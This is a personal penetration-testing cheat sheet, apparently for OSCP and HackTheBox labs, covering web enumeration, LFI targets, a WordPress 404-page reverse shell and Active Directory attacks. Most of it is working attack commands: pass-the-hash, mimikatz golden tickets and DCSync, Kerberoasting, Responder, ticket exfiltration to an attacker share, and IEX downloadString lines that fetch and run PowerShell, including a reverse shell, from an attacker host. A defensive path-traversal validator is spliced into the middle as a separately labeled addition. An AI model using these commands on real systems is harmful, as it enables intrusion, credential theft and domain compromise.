Author: usafitz

NOTES_web_enumeration

DIRB

With Proxy (-P) and output (-o)

Command    # Description
dirb http://ip    # Generic Search
dirb http://10.11.1.222 -P 10.11.1.222:8080 -o dirb_8080_10.11.1.222.txt    # Using Proxy

GOBUSTER

With directory scan (dir) and virtual host scan (vhost)

Command    # Description
gobuster dir -u http://10.11.1.222:8080 -w /usr/share/wordlists/dirb/big.txt    # Directory
gobuster vhost -u http://crafty.htb -r -k -w /usr/share/seclists/Discovery/DNS/namelist.txt --append-domain    # VHOST

DIRBUSTER

Dirbuster is a GUI for directory enumeration

Command    # Description
dirbuster    # Start GUI

WORDLISTS

Wordlist    # Description
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt    # Directory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt    # Extensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt    # Domain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt    # Parameters Wordlist

CREATE WORDLISTS

Command    # Description
cewl -w searchWordlists.txt -d2 -m 3 search.htb    # CeWL on a Website
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p 'IsolationIsKey?'    # Use a List (quote the password so the shell does not treat ? as a glob)
axel    # Axel is a command-line-based download accelerator for Linux

ENUMERATION

Command    # Description
whatweb 10.11.1.101    # Fingerprint the web server and its technologies

GOOGLE BOTS

Place into your user agent

User agent string    # Description
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)    # Newer version
Googlebot/2.1 (+http://www.google.com/bot.html)    # Older version

WORDPRESS

WordPress-specific attacks

Command    # Description
wpscan --url http://10.11.1.234 --passwords /usr/share/wordlists/rockyou.txt --usernames admin    # Brute Force
[!] Valid Combinations Found: Username: admin, Password: password    # Good Result
https://www.hackingarticles.in/wordpress-reverse-shell/    # Reference
CHANGE 404 PAGE - PANEL --> APPEARANCE --> EDITOR    # Path to Replace 404
curl http://10.11.1.234/wp-content/themes/twentytwelve/404.php    # Trigger Reverse Shell
nc -nvlp 80    # Setup Listener
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php    # Common Reverse Shell

LFI / RFI

Local File Inclusion (LFI) / Remote File Inclusion (RFI)
The following is a list of common operating-system files to try through an inclusion or traversal point.

Example
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

Windows
C:\windows\win.ini
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

Linux
/etc/passwd
/etc/shadow
/etc/crontab
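The defender's side of the loadImage example above, as an added example that is not part of the original notes: a path-validation routine that canonicalises a user-supplied filename the way a hardened loadImage handler should (backslashes, single and double URL encoding, absolute paths and drive letters, and ../ segments that only appear after normalisation), plus a small scan over access-log lines that flags requests which would have escaped the image directory. The IMAGE_ROOT directory and the SAMPLE_LOG lines are constructed for the example.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed for this example: the only directory loadImage may read from.
IMAGE_ROOT = "/var/www/app/images"


def canonical_relative(filename):
    """Decode and normalise a user-supplied filename into a POSIX path,
    leaving any leading '..' in place so the caller can see the escape."""
    decoded = unquote(unquote(filename))   # second pass catches %252e%252e
    decoded = decoded.replace("\\", "/")   # ..\..\ counts the same as ../../
    return posixpath.normpath(decoded)


def resolve_image_path(filename, root=IMAGE_ROOT):
    """Return the absolute path under `root` for `filename`, or None when the
    request would leave the image directory (fail closed)."""
    rel = canonical_relative(filename)
    if "\x00" in rel:                                  # NUL-byte truncation
        return None
    if rel.startswith("/") or (len(rel) > 1 and rel[1] == ":"):
        return None                                    # absolute path / C:
    if rel in (".", "..") or rel.startswith("../"):
        return None                                    # climbs out of root
    candidate = posixpath.join(root, rel)
    # Belt and braces: the canonical result must still sit under root.
    if not posixpath.normpath(candidate).startswith(posixpath.normpath(root) + "/"):
        return None
    return candidate


def flag_traversal_requests(log_lines):
    """Return (line, decoded filename) for access-log lines whose loadImage
    filename parameter would have been rejected by resolve_image_path."""
    hits = []
    for line in log_lines:
        try:
            request = line.split('"')[1]       # the quoted "GET /path HTTP/1.1"
            path = request.split(" ")[1]
        except IndexError:
            continue                           # malformed line, skip it
        for value in parse_qs(urlsplit(path).query).get("filename", []):
            if resolve_image_path(value) is None:
                hits.append((line, canonical_relative(value)))
    return hits


# Constructed sample access-log lines (Apache combined format, trimmed).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /loadImage?filename=cat.png HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /loadImage?filename=..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 200 92',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /loadImage?filename=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1821',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /loadImage?filename=thumbs/../dog.png HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line, decoded in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", decoded)
```

The two 200 responses on the flagged lines are the point: a server that answered those requests with content is the one that needs the fix, not just the log review.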

WORDPRESS CREATE REVERSE SHELL 404 PAGE

└─$ cp /usr/share/webshells/php/php-reverse-shell.php .

└─$ 
listening on [any] 80 ...
connect to [192.168.119.188] from (UNKNOWN) [10.11.1.234] 42095
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
 00:42:17 up  4:23,  0 users,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ 

OR

└─$ sudo apt install seclists
└─$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
UPLOAD, INSTALL, AND ACTIVATE

CURL

-i, --include (HTTP FTP): Include response headers in the output. HTTP response headers can include things like server name, cookies, date of the document, HTTP version and more. With non-HTTP protocols, the "headers" are other server communication.

curl -i ip
curl -i http://ip
curl -i http://url.com

BURPSUITE

/etc/hosts ---> add found links to it (like DNS)
INTRUDER - create a payload for various inputs
REPEATER - change the request or reply
ALWAYS CHECK THE BOX FOR INTERCEPT RESPONSE

Active Directory

RUNDOWN OF USEFUL TECHNIQUES

======================================================
TGT USE WITH AUTHENTICATION
└─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345
└─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected]
======================================================
CONNECTIONS VIA CRACKMAPEXEC / PTH / EVIL-WINRM
FIND ACCOUNT LOCKOUT ATTEMPTS IF ABLE:
PS C:\Users\computer.corp> net accounts
└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345
└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz
└─$ crackmapexec smb 10.10.1.299 -u administrator -H 'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam
└─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd
└─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299
└─$ xfreerdp /u:user04 /d:domain.com /p:user04:password12345 /v:10.10.1.299
└─$ rdesktop 10.10.1.299 -u user03 -p password12345
C:\tmp> .\psexec.exe \\dc-dc01 cmd.exe (MAYBE...)
THE PTH OPENS A SHELL ON THE DESKTOP, SO REMOTE IN TO DO THIS
mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe
======================================================
SCRIPTS
SERVICE ACCOUNTS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
LIST USERS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
LIST EVERYTHING
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
SPECIFY A NAME BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')
CHECK CREDENTIALS BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1')   <-- ONLY TO VERIFY
KERBEROAST
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')
REVERSE SHELL (NISHANG)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1')
======================================================
KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -outputformat hashcat | fl
└─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt
======================================================
CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE)
python3 dnstool.py -u 'intelligence\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154
VERIFY
└─$ nslookup
> server 10.129.95.154
> webstuff.intelligence.htb
======================================================
IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE)
└─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb
LOOKING FOR SERVICE ACCOUNT HASH DUMPS; THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT
svc_int$:::16cba97b4bc423795585b0b4bcee5047
======================================================
TIME SYNC
└─$ timedatectl set-ntp false
└─$ sudo rdate -n dc.intelligence.htb
OPTIONAL: sudo ntpdate 10.129.95.154
======================================================
DC SYNC
mimikatz # lsadump::dcsync /user:Administrator
======================================================
SILVER TICKET USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$)
└─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes HASH:HASH
└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected]
======================================================
GOLDEN BUT NOT GOLDEN TICKET
C:\> whoami /user (LOOKING FOR SID)
mimikatz # kerberos::purge
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt
mimikatz # kerberos::list
READOUT TO GOLDEN: /user /domain /sid /target /service:HTTP /rc4
NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST
======================================================
GOLDEN TICKET
C:\Tools\active_directory> psexec.exe \\dc01 cmd.exe
ACCESS DENIED, WHICH CACHES THE HASH
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
mimikatz # misc::cmd
C:\Users\user02.crop> psexec.exe \\dc01 cmd.exe
======================================================
DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT)
SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$com | Get-Member
CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD)
Sub mymacro()
    Shell ("notepad.exe")
End Sub
SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:\Users\user05_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")
======================================================
SERVICE TICKET REQUEST
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets
PS C:\tmp> Add-Type -AssemblyName System.IdentityModel
PS C:\tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com'
PS C:\tmp> klist
THEN MIMIKATZ
sekurlsa::tickets - we see the ticket for HTTP
kerberos::list /export
THEN SEND THE FILE TO ATTACK COMPUTER
PS C:\tmp> copy .\2-40a50000-client06$@HTTP~MSSQL.domain.com-SVCORP.COM.kirbi \\192.168.119.299\share
THEN CRACK
└─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi
CRACK WITH JOHN OR HASHCAT
kirbi2john mssql.kirbi > mssql.hash
john mssql.hash
hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt
======================================================
POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')
Get-NetSession -ComputerName client06 (WORKED)
Get-NetLoggedon -ComputerName client06 (WORKED)
======================================================
RESPONDER
└─$ sudo responder -I tun0
THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION
PS C:\tmp\tickets> net use \\192.168.119.299\share /USER:domain.com\user04
ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!!
PS C:\tmp\tickets> net use \\192.168.119.299\share
MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.com\user03)
======================================================
BLOODHOUND
└─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All
sudo neo4j console
BLOODHOUND GUI - CHANGE PASSWORD
http://localhost:7474
bloodhound
IMPORT THE JSON FILES
======================================================
SMB FILE MOVEMENT
AUTHENTICATE:
PS C:\tmp\tickets> net use \\192.168.119.299\share student /USER:student
MOVE FILES:
PS C:\tmp\tickets> copy .\FILE.kirbi \\192.168.119.299\share
TO STOP THE SHARE:
net use \\192.168.119.299\share /DELETE
======================================================
AD SCRIPT REFERENCE - ALL ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}

AD SCRIPT REFERENCE - SERVICE ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}

AD SCRIPT REFERENCE - LIST USERS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Searcher.FindAll()

AD SCRIPT REFERENCE - CHANGE SCRIPT TO GET A CERTAIN NAME
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="name=Domain Admins"
$Searcher.FindAll()

Attack Tools

ATTACK TOOLS

…tools and uses vary
…take a look at the use of each before attempting


Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors


Ports and Explanations

These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…

PORTS QUICK REFERENCE (DESKTOP BROWSER)

-----------------------------------------------------------------------------
- FIND AVAILABLE NETWORK CONNECTIONS
nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21 - FTP
Try anonymous logins
-----------------------------------------------------------------------------
25 - SMTP (EMAIL)
telnet 10.11.1.72 25
VRFY user
FINISH SESSION: Ctrl + ] / close
VULN - SHELLSHOCK - need valid email address
python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110 - POP
143 - IMAP
587 - SECURE EMAIL
nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass
-----------------------------------------------------------------------------
80 / 443 - WEB
dirb / dirbuster / gobuster / nikto / curl
RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464 - KERBEROS
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111 - NFS mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135 - RPC: Remote Procedure Call
impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445 - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
---------------------------------------------------------------
CIFS (OLD WINDOWS NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433 - MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268 - LDAP (INDICATOR OF DC)
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------
3389 - RDP
rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------



Generic Remote Enumeration

All listed items are separate commands unless otherwise specified…

NMAP – STANDARD FIRST APPROACH

…if sudo is required, it will let you know
…otherwise, just use the pasted command

nmap -A -T4 -p- -sS -O -oN nmap_10.10.1.299.txt ip
nmap -A -T4 -p- -sS -O -oA nmap_10.10.1.299 ip    # -oA writes normal, grepable and XML output with this basename
nmap -sU --top-ports 100 -vv ip
nmap -sV -vv -p <ports> --script vuln ip



SQL & SQL Injection

All commands listed here assume you have a command prompt…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is a MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online


Linux System Enumeration

All commands listed here assume you have a command prompt…
All listed items are separate commands unless otherwise specified…

SIMPLE LINUX ENUMERATION

cat ~/.bash_history
cat /etc/issue
cat /proc/version
whoami
ifconfig
ip addr
hostname
pwd
ls -alh /var/www/html
cat wp-config.php



SMB Server Enumeration

FIND SMB VERSION

…this can be done using wireshark
…or the techniques seen below

SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.

enum4linux -a ip
nbtscan ip

…keeping this for reference… used in a particular technique for SMB v2

sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
.....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.


